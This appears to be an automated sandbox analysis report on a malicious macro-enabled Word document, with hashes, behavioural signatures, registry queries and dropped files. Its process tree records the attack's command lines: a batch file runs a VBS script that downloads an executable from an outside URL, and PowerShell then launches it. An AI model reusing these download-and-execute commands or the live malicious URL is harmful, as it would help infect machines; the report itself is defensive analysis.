Analysis
- Max time kernel: 88s
- Max time network: 151s
- Platform: windows10-2004_x64
- Resource: win10v2004-20220414-en
- Submitted: 25-05-2022 00:03

Tasks
- Static task: static1
- Behavioral task behavioral1
  Sample: 3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559.docm
  Resource: win7-20220414-en
- Behavioral task behavioral2
  Sample: 3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559.docm
  Resource: win10v2004-20220414-en
General
- Target: 3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559.docm
- Size: 630KB
- MD5: 5bed84434cf10693e9928c949dc990ee
- SHA1: 2247d45b53195863c4361f81e4b7facfedb9f33b
- SHA256: 3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559
- SHA512: a1dc22e6dad75603d096db8834012fb7b952126e908206650b261dd461cd098bd79b171d8374a80e89f53796b382a96f2f86b765fdabaa2b40f3283fd2e8b574
Malware Config
Signatures
- Detected phishing page

- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description: Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process
    pid 3024 (cmd.exe), target pid 4776 (WINWORD.EXE)

- Blocklisted process makes network request (1 IoC)
  Processes:
    flow 27, pid 1740 (cscript.exe)

- Process spawned suspicious child process (1 IoC)
  This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
  Processes:
    description: Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process
    pid 260 (DW20.EXE), target pid 4776 (WINWORD.EXE)

- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description / ioc / process):
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                       WINWORD.EXE
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 WINWORD.EXE
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WINWORD.EXE
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                       dwwin.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 dwwin.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  dwwin.exe

- Enumerates system info in registry (2 TTPs, 5 IoCs)
  Processes (description / ioc / process):
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS               WINWORD.EXE
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  WINWORD.EXE
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     WINWORD.EXE
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS               dwwin.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     dwwin.exe

- Script User-Agent (1 IoC)
  Uses user-agent string associated with script host/environment.
  Processes:
    description: HTTP User-Agent header
    flow 27, ioc: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes (pid / process):
    4776  WINWORD.EXE  (2 entries)

- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes (pid / process):
    4776  WINWORD.EXE     (4 entries)
    5004  powershell.exe  (2 entries)

- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description / pid / process):
    Token: SeDebugPrivilege  5004  powershell.exe

- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes (pid / process):
    4776  WINWORD.EXE  (4 entries)

- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes (description / pid / process / target process):
    PID 4776 wrote to memory of 3024  4776  WINWORD.EXE  cmd.exe         (2 entries)
    PID 4776 wrote to memory of 260   4776  WINWORD.EXE  DW20.EXE        (2 entries)
    PID 3024 wrote to memory of 1740  3024  cmd.exe      cscript.exe     (2 entries)
    PID 260 wrote to memory of 4748   260   DW20.EXE     dwwin.exe       (2 entries)
    PID 3024 wrote to memory of 5004  3024  cmd.exe      powershell.exe  (2 entries)
Processes (process tree; indentation shows parent/child depth, PIDs taken from the signature tables above)
- WINWORD.EXE (PID 4776)
  Path: C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559.docm" /o ""
  Signatures: Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - cmd.exe (PID 3024)
    Path: C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c C:\DiskDrive\1\Volume\errorfix.bat
    Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory
    - cscript.exe (PID 1740)
      Path: C:\Windows\system32\cscript.exe
      Command line: cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://ventilator-aer.ro/wp-content/uploads/2020/02/0303/ginndoe.jp C:\DiskDrive\1\Volume\BackFiles\ZXTRTU.exe
      Signatures: Blocklisted process makes network request
    - powershell.exe (PID 5004)
      Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\ZXTRTU.exe'
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - DW20.EXE (PID 260)
    Path: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
    Command line: "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 4676
    Signatures: Process spawned suspicious child process; Suspicious use of WriteProcessMemory
    - dwwin.exe (PID 4748)
      Path: C:\Windows\system32\dwwin.exe
      Command line: C:\Windows\system32\dwwin.exe -x -s 4676
      Signatures: Checks processor information in registry; Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\DiskDrive\1\Volume\BackFiles\ZXTRTU.exe
  Filesize: 2KB
  MD5: 752b20d2159ddc689eb9deaa771a095b
  SHA1: 307772a0bed3fbf19166493cad7d305d30cb7b2a
  SHA256: 041ca869d8c500b245a1b32c330507351913f544e12f608b6d583eadb0f09507
  SHA512: b1d1be1e050247951dc8b50bb625053ca2434d4db1e1f2d897238911d5068e88429ddccb373591b9d0d6bfdb4864d50853be0d8ab7044cecda954dfb7f67a76f

- C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs
  Filesize: 777B
  MD5: aaa0e8aad75d0ff7247f8a389d9e1b1c
  SHA1: 1e735b3ddb654cbefaa0fff7c2d8c8812dbaaf16
  SHA256: e1722cf4f9d9fff3e3b9bbc825c7d88256e8db18df1c125aeee6346a85ad1c3a
  SHA512: a75327cfcfb27cf8ade0ded3191eb4129490792dbc5058424a552e492abc96e31806ddd99fc64797e0d46a6dc816c913e7ec4e07f99a6747166237328608f125

- C:\DiskDrive\1\Volume\errorfix.bat
  Filesize: 2KB
  MD5: 45e1c5c5bdd874c41b6316b196533bf0
  SHA1: e4cce2e1c47cb439116b5ace0e9a231b83c4c7c7
  SHA256: f9c76220ad7a43ab310dec13c868a8ae55fac4328b5322ea4945e23323abe574
  SHA512: 185e5a7c77d5ce063180a97df0c09166b640adfd9e5fae0c18269f49101982b5b254cd9d92b7e15a8a6285bbc0b66a7ebb5e22f28ce867e141355c227e8ddd24